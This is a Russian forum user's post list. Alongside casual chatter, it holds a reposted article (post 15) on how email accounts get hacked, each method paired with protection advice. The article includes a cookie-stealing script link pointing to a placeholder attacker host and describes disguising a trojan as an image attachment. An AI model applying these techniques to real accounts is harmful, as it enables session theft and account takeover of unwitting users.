Jump to content

Alucard

Members
  • Posts

    324
  • Joined

Everything posted by Alucard

  1. Пасиба всем ищо раз) 2sag1966 на успешно врядли, а вот сдать бы самое оно=)
  2. все прошло хорошо, хотя нет послали (не меня) еще за воткай) ис прикольнава падарили: - бита люминиивая 1 штука - кинг, каторый стивен 2 штуки неужели я такой антисациальный тип?)
  3. Всем спасибо!) приятно что не забыли=)
  4. проинформирую) http://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php втроенный виндовый занял почетное последнее место в тестах))) собсна ничо другова я от него не ожидал.
  5. посмотрел вчера 1612, такое нада в кинотеатрах смотреть, а не пиратскую экранку)
  6. Поздравляю, успел-таки) Желаю всего наилучшего!!!
  7. Присоединяюсь к поздравлениям!) 2Leonardo я прослежу, бугога...
  8. не владею, пытаюс осваивать в свободное время с помощью аськи и т.д.
  9. а мне диалоги понравились)) и ниипет... да и перестрелочки прикольные. а на оскар он и не претендовал...
  10. Jeefo у меня тоже был, пустил под нож ибо ничо ценного заразить не успел. Но Каспер 6ой должен вылечить, вроде Win32е он лечит... MS06-001 WMF Exploit --- гы да тя походу ломануть хотели, это эксплоит который прдставляет собой спец.медиафайл запуская который ты дариш доступ к своему компу (при условии что ты уязвим). Делете иму безоговорочный
  11. Украл, выпил - в тюрьму; украл, выпил - в тюрьму -- романтика)))
  12. кошмар просто, дальнейший просмотр снукера потерял для меня всякий смысл.
  13. ахринеть, так это салливан вылетел? все, две недели траура...
  14. Твои шансы все меньше) Картер сделал твоего хендри)...
  15. О взломе и защите почты. Вот нашел интересную статейку. Способ 1. Социальная инженерия Социальная инженерия - пожалуй самый простой способ получения чужого пароля, регистрации нужной программы и т.д. Принцип соц. инженерии состоит в правильном психологическом подходе к человеку, от которого вы собственно и собираетесь что-то получить. Самый примитивный способ такого подхода появился еще на заре инета. Пользователю посылали письмо якобы от администрации почтового сервиса с просьбой подтвердить свои персональные данные, и многие подтверждали. Даже сейчас в сети можно встретить примерно такие объявления: "Я вот тут недавно обнаружил, что по адресу pass_recovery@mail.ru (адрес и сервер могут быть любыми прим. автора) сидит робот, который отвечает за восстановление паролей к сервису @MAIL.RU. Но что самое интересное, если послать ему специально составленное письмо, где указать реальный е-мail c паролем и второй который нужно вломать, то робот без проверки вышлет пароли сразу к двум ящикам..." В настоящее время эти способы практически утратили свою актуальность. Пользователи уже не так наивны как прежде, да и администрация почтовых серверов предупреждает своих клиентов. Хотя и сейчас на них ведутся люди. Социальная инженерия может быть полезна в сочетании с другими способами взлома почтового ящика. Например усыпив бдительноть пользователя, можно заставить перейти его по "ядовитой" ссылке. Здесь главное не повторяться, а предлагать что-то новое. Защита. Никогда не посылайте свои логин-пароль, в ответ на письма пришедшие от "администрации" какого-либо ресурса, где вы зарегистрированы (не зарегистрированы). А лучше вообще на них не отвечайте. Уж если сильно сомневаитесь, пошлите письмо администрации сервиса, а к письму приложите текст пришедшего вам письма (без пароля естественно), и только на тот e-mail, что указан на сервере. Помните главное правило - вводите ваши данные только в одном месте, на главной странице почтового сервера. Никогда не кликайте по ссылкам в письме, если у вас нет 100% доверия к его отправителю и содержимому. Лучше нажмите на ссылке правой кнопкой мыши, и выберете пункт "Сохранить объект как..." (для браузера Internet Explorer), а затем в офлайн просмотрите документ. Документы HTML, или попросту обычные Web странички, могут быть опасны при просмотре их онлайн (читайте следующий пункт). Способ 2. Кража cookie и сессии пользователя На мой взгляд наиболее реальный, быстрый и незаметный способ получить несанкционированный доступ к почте. Cookie (в переводе печенье) - это текстовые файлы хранящиеся на вашем компьютере в специальном месте, и содержащие какую-либо служебную информацию. Что нам надо знать о Cookie. Многие веб сервисы при заходе пользователя на их ресурс, пихают ему "печеньку" с его персональными данными. К примеру если вы в настройках на сервисе укажете выводить в таблице на странице 50 столбцов с данными, то эта информация запишется в Cookie, и при следующем заходе на этот сервис вам сразу покажут 50 столбцов. Но самое главное, прочитать данные из Cookie может только тот web сайт, который вам эту Cookie поставил. То есть куки поставленные на yandex.ru, не могут быть прочитаны рамблером, или каким нибудь superhack.com. Теперь переходим к главному. Когда мы на сайте проходим авторизацию, при входе на свой почтовый ящик сервер вешает нам Cookie, куда записывает номер сессии пользователя, или гораздо реже зашифрованный пароль (обычно алгоритмом md5), или еще реже (иногда встречается на небольших и древних сервисах) - ваш пароль записанный в открытом виде. Просто бери и пользуйся! Зачем это надо? Просто в противном случае, при переходе с одной страницы на другую, нам пришлось бы каждый раз заново проходить авторизацию (вводить логин-пароль). А так сервер читает из Cookie нашу сессию и сравнивает с сесией назначеной авторизованному пользователю. Если все окей, вы читаете свою почту. Если с паролем к почте все ясно, то в чем его отличие от сессии. Сессия - это просто набор из цифр и букв случайно сгенерированых сервером (как бы временный пароль). Одна копия записана у вас в куках, другая хранится на сервере. Причем сессия имеет "время жизни" (от нескольких минут, до нескольких часов), которое зависит от настроек сервиса. По истечении этого времени, копия сессии пользователя расположенная на сервере удаляется. И сессия записанная у пользователя окажется нерабочей (необходима новая авторизация). Вот пример сессии на почтовом сервисе rambler.ru: http://mail.rambler.ru/Session/3112538-ru3lUHY9oFag9n79p4... Теперь думаю суть ясна. Получив свежие пользовательские Cookie с какого нибудь lаmer@yаndеx.ru или lаmer@mаil.ru, мы сможем без проблем попасть на чужой ящик, даже если пользователь уже давно вышел из него (Не всегда. Об этом читайте в "защита"). Встает вопрос, как увести куки пользователя. Есть один способ. Пользователю посылается письмо в HTML формате, в которое вставляется специальный java-скрипт читающий содержание его Cookie и отсылающий эту информацию своему хозяину. Достаточно открыть такое письмо для просмотра в режиме online, и вы можете потеряеть свой ящик навсегда. Хотите протестировать свой ящик на уязвимость? Если да, пошлите аттачем себе HTML документ следующего содержания: <html> <head> <script language="JavaScript"> alert(document.cookie) </script> </body> </html> Откройте это файл прямо на сервере в режиме онлайн, и если сервер не отфильтровал его содержимое, вы увидете свои Cookie (см. скриншот) Атака на собственный почтовый ящик. Наша сессия как на ладони. Как это получилось? Помните начало темы: "прочитать данные из Cookie может только тот web сайт, который вам эту Cookie поставил". Мы почитали Cookie Rambler.ru, а ведь открытый файл как раз и находится на Рамблере! Но для взлома данный способ не пригоден, т.к. для получения сессии (Cookie) надо попасть в почтовый ящик. В реальной ситуации поступают так: JavaScript вставляется в само письмо, при этом письмо должно быть в HTML формате. Код выглядит как безобидная ссылка, но кликнув по ней ваши куки будут отправлены специальному скрипту, который их запишет и пошлет письмом хакеру (вариантов много). Чтобы заставить пользователя кликнуть ссылку, достаточно немного социальной инженерии. Вот пример кода: <a href="http://хак.ру/hak.php?+<script>document.cookie</script>">www.rambler.ru/support/info.html</a> Конечно данный код может фильтроваться сервером. Но ведь можно встроить скрипт в теги показа картинки. Пользователь увидит картинку, а хакер получит куки. Обычно такие скрипты пролетают на ура. Код приводить не буду, тематика статьи всеже защита а не нападение. Кому надо, тот найдет. Должен заметить, что на это попадались и еще попадуться даже опытные администраторы известных сайтов. Для редактирования полученных Cookie используют программу Cookie Editor. Вывод! При целенаправленной атаке на ваш ящик... Защита. Вы замечали на вашем ящике кнопку "Выход", "Exit" и т.д. А знаете зачем она нужна? Она закрывает вашу сессию! Да-да, именно ту сессию, о которой писалось выше. Закрыв ящик "как положено", никто уже не сможет на него попасть без пароля, кража Cookie становится бесполезной. По возможности, никогда не читайте письма "онлайн". Сохраните письма на комп, а уже затем, отключившись от Инета, читайте. В этом случае никакой встроенный скрипт и прочая гадость вам не страшны. И поосторожнее кликайте по ссылкам в письмах. Текст ссылки и ее истинное назначение могут быть разными! Способ 3. Протроянивание компьютера Если у злоумышленника есть физический доступ к нужному компьютеру, то он 100% может получить не только пароль к вашей почте, но и следить за всеми действиями пользователя на нем (очень актуально для офисов, компьютерных клубов и интернет кафе). При отсутствии такого доступа можно послать шпиона прямо в аттаче к письму. Конечно запускать неизвестный EXE-шник врядли кто станет. А что если сделать иконку у программы как у текстового документы или JPEG рисунка, переименовать файл в Foto.jpg или в Info.txt, заполнить спец-поля при компилировании и запихнуть в архив. При этом данное вложение не должно быть неожиданным. К примеру вы на сайте знакомств познакомились с девушкой. После нескольких дней переписки, она врядли западозрит неладное в очередной фотке. Да и что к тому же, при запуске программы мешает показать ей настоящее фото (склеенное с программой), запустить шпиона, а затем удалить его тело из запущенного файла. При грамотном подходе не спасет и антивирус. Шансы злоумышленника вырастут во много раз (см. скриншот). С виду обычная картинка, а внутри... Шпион выдают строки "версия файла" и "производитель". У обычной картинки их нет. Протроянить компьютер можно так же через уязвимости браузера или самой системы, с помощью соответствующего эксплоита. Но этот способ годится только если будующая жертва использует голую систему без установленных свежих сервис паков. Да и то многие выложенные публичные эксплоиты, на поверку не работают. Но как вариант, этот способ совсем не лишний. Защита. Непонятно почему, но многие пользователи считают главным гарантом своей безопасности в сети - антивирус. Никакой антивирус с самой свежей базой не спасет вас от грамотно написанной и хорошо упакованной шпионской программы, которая ему незнакома. Трояны типа Смерть Ламера и используют ламеры. Человек опытный напишет свое, или в крайнем случае найдет приватный софт. В данном случае, вам намного полезнее фаервол. Если вы еще не знаете что это такое, закройте инет соединение, и не выходите в сеть пока его себе не поставите. Конечно опытный взломщик его может обойти, но от главных проблем он вас спасет. Выходите в сеть только под учетной записью с ограниченными правами. Для инета вам админские права не нужны, а вот многим шпионам для своей маскировки даже очень. Многие без них даже не запустятся. И ставте свежие заплатки от MICROSOFT. Не запускайте чужие аттачи к письмам. Помните, что программу можно замаскировать под картинку, или даже текстовый документ. Способ 4. Взлом почтового сервера Не секрет, что в любых крупных проектах всегда существуют баги. Вопрос только в том, насколько они опасны, и как оперативно администрация сервиса следит за безопасностью. Что уж говорить о почтовых сервисах средней руки, когда в свое время ошибки в безопасности были найдены даже на гигантах вроде MAIL.RU. Самые распространенные ошибки состоят в возможности ижектировать в исполняемые скрипты своего кода, приводдящие к тому или иному действию. К примеру, с помощью найденной ошибки, хакер может изменить код HTML документа на сервере, встроив свой. Помните Способ 2. Кража cookie и сессии пользователя. В этом случае еще до просмотра почты, ваши данные уплывут налево. Другой способ называется SQL-injection или си-кью-эл инжекция. Его основа состоит в возможности подмены sql запросов к базе данных сервера. Таким образом можно получать любые данные из серверной базы. Как вам к примеру полный список аккуантов рамблера с паролями в придачу. Если ошибок в интерфейсе не найдено, можно попробовать взломать сервер изнутри. Узнаем вервсию Аппача и других имеющихся служб, а затем ищем соответствующюю отмычку (эксплоит). Но это в теории. На практике поломать известные почтовые службы типа Yandex.ru, Rambler.ru, Mail.ru, вряд ли удасться, их админы не зря едят свой хлеб. Другое дело с проектами попроще. Допустим, что нужный нам аккуант зарегистрированн на нескольких форумах. Не для кого не секрет баги в одном из самых популярных форумов PhpBB (а есть и другие). Найти бажную версию и слить базу пользователей иногда дело нескольких минут (а как вы думали пополняют спам-листы). Очень может быть, что пароли к почте и форуму совпадут. Защита. От взлома почтового сервера вас не защитит ничто. Советую выбирать для своей почты лишь крупные почтовые службы. Они своевременно обновляют свой серверный софт и следят за безопасностью почтовой системы. Не стоит использовать один пароль на все случаи жизни. Сейчас многие пользуются почтой через Web интерфейс. Да не спорю - это "красиво и удобно". Но! Забирать почту по протоколам POP3 или IMAP с помощью того же The Bat - быстрее, и главное безопаснее. Способ 5. Программы для взлома почты Единственными представителями программ подобного рода являются т.н. брутфорсеры. Такая программа простым перебором или по словарю пытается авторизоваться на почтовом сервере. Принцип их работы предельно прост. Если пароль не подходит, программа пробует новый пароль, и так до тех пор, пока верный пароль не будет найден. Тем не менее, реальность далека от идеала. Скорость перебора целиком зависит от ширины вашего канала. При Dial-up даже не стоит пробовать. При выделенке вас ожидает огромный интернет трафик. Если пароль сложный, и не менее 6 символов, цена в случае удачи окажется слишком высокой. И еще один самый главный момент. Сейчас практически везде используются системы, делающие брутфорс паролей невозможным в принципе. После нескольких неудачных попыток авторизации, вас просто пошлют лесом. Такие программы имеет смысл ипользовать лишь в тех случаях, кагда подбираемый пароль вам хотя бы частично известен, или вы примерно знаете его длинну и содержание. Тем не мение судя по некоторым форумам и поисковым запросам, большое количество людей верят в чудо-программы по взлому почты. Поверьте моему опыту - создание таких программ в принципе невозможно (трояны, кейлоггеры, сниферы и формграбберы не в счет). Судите сами: Теоретически допустим некий хакер нашел уязвимость на майл.ру, приводящую к несанкционированному доступу к чужой почте. Затем написал программу, где реализавал данную возможность. Пока хакер писал программу, пока о ней кто-то узнал, дыру закроют и программа превратится в пустышку. Не стоит так же забывать, что хакеры при взломе используют анонимные приватные прокси не ведущие логов. А вы полезете ломать майл.ру со своего компа? Даже если теоретически есть рабочая программа, то на следующий день ждите к себе домой наряд милиции. Прекрасный пример программа Rapidshare, которая вроде позволяет качать файлы с известной рапиды. Новые версии выходят чуть не каждую неделю, но рабочей я так и не видел. Рапида затыкает свои дыры раньше, чем успевает обновиться программа. Тем не мение то здесь, то там предлагают "Универсальные взломщики почты", некоторые еще и платные. Имейте в виду, что это или развод на деньги, или троян. Защита. Устанавливайте нормальные пароли. Используйте для просмотра почты почтовые программы. Стоит попробовать, потом вас на Web интерфейс калачом не заманишь. (брал отсюда http://www.mailinfo.ru/story06/11/08/8203376) Статья предназначалась только для ознакомительных целей...
  16. гы а я и незнал) З ДНЕМ РОЖДЕНИЯ)
×
×
  • Create New...